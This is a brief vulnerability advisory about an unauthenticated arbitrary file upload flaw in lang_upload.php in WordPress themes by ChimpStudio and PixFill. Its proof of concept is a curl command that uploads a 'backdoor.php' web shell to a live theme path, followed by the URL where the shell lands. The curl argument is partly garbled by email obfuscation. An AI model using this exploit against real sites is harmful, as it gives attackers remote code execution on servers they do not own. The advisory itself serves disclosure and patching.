Multiple themes from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.
Create a malicious file “backdoor.php”, then curl https://website.com/wp-content/themes/westand/include/lang_upload.php -F “mofile[][email protected]” The file will be at https://example.com/wp-content/themes/westand/languages/backdoor.php